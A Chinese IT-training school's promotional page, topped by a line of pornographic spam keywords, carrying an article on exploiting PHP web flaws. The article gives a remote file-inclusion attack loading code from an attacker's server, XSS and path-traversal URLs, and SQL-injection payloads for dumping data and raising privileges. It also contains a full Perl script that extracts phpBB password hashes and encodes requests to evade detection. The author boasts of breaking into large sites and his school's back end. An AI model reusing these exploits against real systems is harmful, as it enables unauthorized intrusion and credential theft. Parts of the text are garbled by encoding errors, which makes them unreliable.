欧美人妻日韩精品,久久青青草原国产精品最新片,亚洲特级毛片av无码专区,一本一道色欲综合网中文字幕

鄭州信息科技中專職業(yè)學(xué)院中專部

不僅僅統(tǒng)招學(xué)歷喲

  • 熱門專業(yè)!
  • 大學(xué)校園!
  • 就業(yè)保障!
  • 拿學(xué)歷又能高薪就業(yè),誰(shuí)能不愛!
了解詳情>
鄭州北大青鳥翔天信鴿參加“安心學(xué)習(xí)·放心就業(yè)”公約簽約儀式

讓每一個(gè)家庭“安心”、“放心”

  • 教學(xué)為本
  • 師愛為魂
  • 安心學(xué)習(xí)
  • 放心就業(yè)
了解詳情>
北大青鳥20周年慶典與總部年會(huì)鄭州翔天信鴿榮獲7項(xiàng)榮譽(yù)

深耕細(xì)作IT職業(yè)教育15載

  • 青鳥之星教學(xué)質(zhì)量大獎(jiǎng)
  • 卓越風(fēng)云人物
  • 北大青鳥中心理事會(huì)成員
  • 七項(xiàng)榮耀載譽(yù)而行!
了解詳情>
鄭州北大青鳥學(xué)員喜獲全國(guó)IT精英挑戰(zhàn)賽冠軍

我們教學(xué)怎么樣

  • 實(shí)力見證
  • 網(wǎng)絡(luò)組一等獎(jiǎng)
  • 網(wǎng)絡(luò)組二等獎(jiǎng)
  • 軟件組四等獎(jiǎng)
  • 200家校區(qū)脫穎而出!
了解更多>
北大青鳥榮獲315重承諾守信用放心品牌

北大青鳥職業(yè)IT20周年

  • 重承諾
  • 守信用
  • 放心品牌
  • 放心學(xué)習(xí)
  • 靠靠譜譜好就業(yè)!
了解更多>
學(xué)IT好工作高薪就業(yè)

我命由我不由天

  • 學(xué)個(gè)性的技術(shù)
  • 做愛做的事
  • 掙滿意的錢
  • 衣食無(wú)憂
  • 選擇寬且高大尚!
了解更多>
鄭州北大青鳥IT培訓(xùn)辦學(xué)14年

我們靠不靠譜

  • 14年辦學(xué)
  • 14年磨練
  • 14年成長(zhǎng)
  • 14年探索
  • 只為讓每個(gè)學(xué)員成材!
了解更多>
鄭州北大青鳥IT培訓(xùn)

不打工也牛掰

  • 好工作
  • 好環(huán)境
  • 高薪資
  • 好課程
  • 支持你成為有“錢”人!
了解更多>

學(xué)IT就讀北大青鳥

  • 好工作
  • 好未來
  • 好老師
  • 好課程
  • 支持你成為受人尊敬的人!
了解更多>
常見php頁(yè)面漏洞分析及相關(guān)問題解決
作者:北大青鳥 添加時(shí)間:12-16 瀏覽次數(shù):0

 從現(xiàn)在的網(wǎng)絡(luò)安全來看,大家最關(guān)注和接觸最多的WEB頁(yè)面漏洞應(yīng)該是ASP了。然而在PHP方面來看,也同樣存在很嚴(yán)重的安全問題,但是這方面的文章卻不多。在這里,鄭州電腦學(xué)校就跟大家來稍微的討論一下PHP頁(yè)面的相關(guān)漏洞吧。

  我對(duì)目前常見的PHP漏洞做了一下總結(jié),大致分為以下幾種:包含文件漏洞,腳本命令執(zhí)行漏洞,文件泄露漏洞,SQL注入漏洞等幾種。當(dāng)然,至于COOKIE欺騙等一部分通用的技術(shù)就不在這里討論了,這些資料網(wǎng)上也很多。那么,我們就一個(gè)一個(gè)來分析一下怎樣利用這些漏洞吧!

  首先,我們來討論包含文件漏洞。這個(gè)漏洞應(yīng)該說是PHP獨(dú)有的吧。這是由于不充分處理外部提供的惡意數(shù)據(jù),從而導(dǎo)致遠(yuǎn)程攻擊者可以利用這些漏洞以WEB進(jìn)程權(quán)限在系統(tǒng)上執(zhí)行任意命令。我們來看一個(gè)例子:假設(shè)在a.php中有這樣一句代碼:

以下是引用片段:
include($include."/xxx.php");
  ?>

  在這段代碼中,$include一般是一個(gè)已經(jīng)設(shè)置好的路徑,但是我們可以通過自己構(gòu)造一個(gè)路徑來達(dá)到攻擊的目的。比方說我們提交:a.php?include=http://web/b.php,這個(gè)web是我們用做攻擊的空間,當(dāng)然,b.php也就是我們用來攻擊的代碼了。我們可以在b.php中寫入類似于:passthru("/bin/ls /etc");的代碼。這樣,就可以執(zhí)行一些有目的的攻擊了。(注:web服務(wù)器應(yīng)該不能執(zhí)行php代碼,不然就出問題了。相關(guān)詳情可以去看<<如何對(duì)PHP程序中的常見漏洞進(jìn)行攻擊>>)。在這個(gè)漏洞方面,出狀況的很多,比方說:PayPal Store Front,HotNews,Mambo Open Source,PhpDig,YABB SE,phpBB,InvisionBoard,SOLMETRA SPAW Editor,Les Visiteurs,PhpGedView,X-Cart等等一些。

  接著,我們?cè)賮砜匆幌履_本命令執(zhí)行漏洞。這是由于對(duì)用戶提交的URI參數(shù)缺少充分過濾,提交包含惡意HTML代碼的數(shù)據(jù),可導(dǎo)致觸發(fā)跨站腳本攻擊,可能獲得目標(biāo)用戶的敏感信息。我們也舉個(gè)例子:在PHP Transparent的PHP PHP 4.3.1以下版本中的index.php頁(yè)面對(duì)PHPSESSID缺少充分的過濾,我們可以通過這樣的代碼來達(dá)到攻擊的目的:http://web/index.php?PHPSESSID=">在script里面我們可以構(gòu)造函數(shù)來獲得用戶的一些敏感信息。在這個(gè)漏洞方面相對(duì)要少一點(diǎn),除了PHP Transparent之外還有:PHP-Nuke,phpBB,PHP Classifieds,PHPix,Ultimate PHP Board等等。

  再然后,我們就來看看文件泄露漏洞了,這種漏洞是由于對(duì)用戶提交參數(shù)缺少充分過濾,遠(yuǎn)程攻擊者可以利用它進(jìn)行目錄遍歷攻擊以及獲取一些敏感信息。我們拿最近發(fā)現(xiàn)的phpMyAdmin來做例子。在phpMyAdmin中,export.php頁(yè)面沒有對(duì)用戶提交的'what'參數(shù)進(jìn)行充分過濾,遠(yuǎn)程攻擊者提交包含多個(gè)'../'字符的數(shù)據(jù),便可繞過WEB ROOT限制,以WEB權(quán)限查看系統(tǒng)上的任意文件信息。比方說打入這樣一個(gè)地址:export.php?what=../../../../../../etc/passwd%00 就可以達(dá)到文件泄露的目的了。在這方面相對(duì)多一點(diǎn),有:myPHPNuke,McNews等等。

  最后,我們又要回到最興奮的地方了。想想我們平時(shí)在asp頁(yè)面中用SQL注入有多么爽,以前還要手動(dòng)注入,一直到小竹悟出"SQL注入密笈"(嘿嘿),然后再開做出NBSI以后,我們NB聯(lián)盟真是拉出一片天空。曾先后幫CSDN,大富翁論壇,中國(guó)頻道等大型網(wǎng)站找出漏洞。(這些廢話不多說了,有點(diǎn)跑題了...)。

  還是言規(guī)正傳,其實(shí)在asp中SQL的注入和php中的SQL注入大致相同,只不過稍微注意一下用的幾個(gè)函數(shù)就好了。將asc改成ASCII,len改成LENGTH,其他函數(shù)基本不變了。其實(shí)大家看到PHP的SQL注入,是不是都會(huì)想到PHP-NUKE和PHPBB呢?不錯(cuò),俗話說樹大招分,像動(dòng)網(wǎng)這樣的論壇在asp界就該是漏洞這王了,這并不是說它的論壇安全太差,而是名氣太響,別人用的多了,研究的人也就多了,發(fā)現(xiàn)的安全漏洞也就越多了。PHPBB也是一樣的,現(xiàn)在很大一部分人用PHP做論壇的話,一般都是選擇了PHPBB。它的漏洞也是一直在出,從最早phpBB.com phpBB 1.4.0版本被人發(fā)現(xiàn)漏洞,到現(xiàn)在最近的phpBB 2.0.6版本的groupcp.php,,以及之前發(fā)現(xiàn)的search.php,profile.php,viewtopic.php等等加起來,大概也有十來個(gè)樣子吧。這也一直導(dǎo)致,一部分人在研究php漏洞的時(shí)候都會(huì)拿它做實(shí)驗(yàn)品,所謂百練成精嘛,相信以后的PHPBB會(huì)越來越好。

  好了,我們還是來分析一下漏洞產(chǎn)生的原因吧。拿viewtopic.php頁(yè)面來說,由于在調(diào)用viewtopic.php時(shí),直接從GET請(qǐng)求中獲得"topic_id"并傳遞給SQL查詢命令,而并沒有進(jìn)行一些過濾的處理,攻擊者可以提交特殊的SQL字符串用于獲得MD5密碼,獲得此密碼信息可以用于自動(dòng)登錄或者進(jìn)行暴力破解。(我想應(yīng)該不會(huì)有人想去暴力破解吧,除非有特別重要的原因)。先看一下相關(guān)源代碼:

   以下是引用片段:
   #   if(isset($HTTP_GET_VARS[POST_TOPIC_URL]))
  #   {
  #      $topic_id=intval($HTTP_GET_VARS[POST_TOPIC_URL]);
  #   }
  #   elseif(isset($HTTP_GET_VARS['topic']))
  #   {
  #      $topic_id=intval($HTTP_GET_VARS['topic']);
  #   }  從上面我們可以看出,如果提交的view=newest并且sid設(shè)置了值的話,執(zhí)行的查詢代碼像下面的這個(gè)樣子(如果你還沒看過PHPBB源代碼的話,建議你看了再對(duì)著這里來看,受影響系統(tǒng)為:phpBB 2.0.5和phpBB 2.0.4)! ∫韵率且闷危
   #        $sql = "SELECT p.post_id
  #        FROM " . POSTS_TABLE . " p, " . SESSIONS_TABLE . " s, " . USERS_TABLE . " u
  #        WHERE s.session_id = '$session_id'
  #         AND u.user_id = s.session_user_id
  #         AND p.topic_id = $topic_id
  #         AND p.post_time >= u.user_lastvisit
  #        ORDER BY p.post_time ASC
  #        LIMIT 1";
  Rick提供了下面的這斷測(cè)試代碼:
  use IO::Socket;
  $remote = shift || 'localhost';
  $view_topic = shift || '/phpBB2/viewtopic.php';
  $uid = shift || 2;
  $port = 80;
  $dbtype = 'mysql4';   # mysql4 or pgsql
  print "Trying to get password hash for uid $uid server $remote dbtype: $dbtype
";
  $p = "";
  for($index=1; $index<=32; $index++)
  {
  $socket = IO::Socket::INET->new(PeerAddr => $remote,
  PeerPort => $port,
  Proto => "tcp",
  Type => SOCK_STREAM)
  or die "Couldnt connect to $remote:$port : $@
";

  $str = "GET $view_topic" . "?sid=1&topic_id=-1" . random_encode(make_dbsql()) . "&view=newest" . " HTTP/1.0
";
  print $socket $str;
  print $socket "Cookie: phpBB2mysql_sid=1
";  # replace this for pgsql or remove it
  print $socket "Host: $remote
";
  while ($answer = <$socket>)
  {
  if ($answer =~ /location:.*x23(d+)/) # Matches the location: viewtopic.php?p=#
  {
  $p .= chr ();
  }
  }
  close($socket);
  }
  print "
MD5 Hash for uid $uid is $p
";
  # random encode str. helps avoid detection
  sub random_encode
  {
  $str = shift;
  $ret = "";
  for($i=0; $i  {
  $c = substr($str,$i,1);
  $j = rand length($str) * 1000;
  
  
  if (int($j) % 2 || $c eq ' ')
  {
  $ret .= "%" . sprintf("%x",ord($c));
  }
  else
  {
  $ret .= $c;
  }
  }
  return $ret;
  }
  sub make_dbsql
  {
      if ($dbtype eq 'mysql4')
  {
  return " union select ord(substring(user_password," . $index . ",1)) from phpbb_users where user_id=$uid/*" ;
  } elsif ($dbtype eq 'pgsql')
  {
  return "; select ascii(substring(user_password from $index for 1)) as post_id from phpbb_posts p, phpbb_users u where u.user_id=$uid or false";
  }
  else
  {
  return "";
  }
  }
  這段代碼,我就不多做解釋了.作用是獲得HASH值.  看到這里,大家可能有點(diǎn)疑問,為什么我前面講的那些改的函數(shù)怎么沒有用到,我講出來不怕大家笑話:其實(shí)網(wǎng)上很多站點(diǎn)有些頁(yè)面的查詢語(yǔ)句看起來會(huì)是這樣:

  display.php?sqlsave=select+*+from+aaa+where+xx=yy+order+by+bbb+desc

  不要笑,這是真的,我還靠這個(gè)進(jìn)過幾個(gè)大型網(wǎng)站.至于哪一些,不好講出來,不過我們學(xué)校的網(wǎng)站,我就是靠這個(gè)進(jìn)后臺(tái)的,把前面那函數(shù)用上吧.不然你只有改人家的密碼了哦!!!

  差點(diǎn)忘了一點(diǎn),在SQL注入的時(shí)候,PHP與ASP有所不同,mysql對(duì)sql語(yǔ)句的運(yùn)用沒有mssql靈活,因此,很多在mssql上可以用的查詢語(yǔ)句在mysql中都不能奏效了. 一般我們常見的注入語(yǔ)句像這樣:aaa.php?id=a' into outfile 'pass.txt或是aaa.php?id=a' into outfile 'pass.txt' /*再進(jìn)一步可以改成:aaa.php?id=a' or 1=1 union select id,name,password form users into outfile 'c:/a.txt

  這樣可以將數(shù)據(jù)庫(kù)數(shù)據(jù)導(dǎo)出為文件,然后可以查看.

  或是這樣:mode=',user_level='4

  這個(gè)語(yǔ)句一般用在修改資料時(shí),假設(shè)頁(yè)面存在漏洞的話,就可以達(dá)到提升權(quán)限的做用.

  其它的如' OR 1=1 -- 或者:1' or 1='1則跟asp差不多.這里不多講了.在php里面,SQL注入看來還是漏洞之首啊,有太多的頁(yè)面存在這個(gè)問題了.

  其實(shí)大家可以看出來,上面那些分類歸根結(jié)底只有一個(gè)原因:提交參數(shù)沒過濾或是過濾不夠嚴(yán)謹(jǐn).
    文章由鄭州北大青鳥整理,轉(zhuǎn)載請(qǐng)注明:
http://

 

 

 

 

本文由站河南北大青鳥校區(qū)整編而成,如需了解更多IT資訊類的文章、新聞、課程和學(xué)習(xí)技巧、就業(yè)案例、招生詳情等問題,可以對(duì)在線咨詢老師進(jìn)行一對(duì)一問答!


分享到: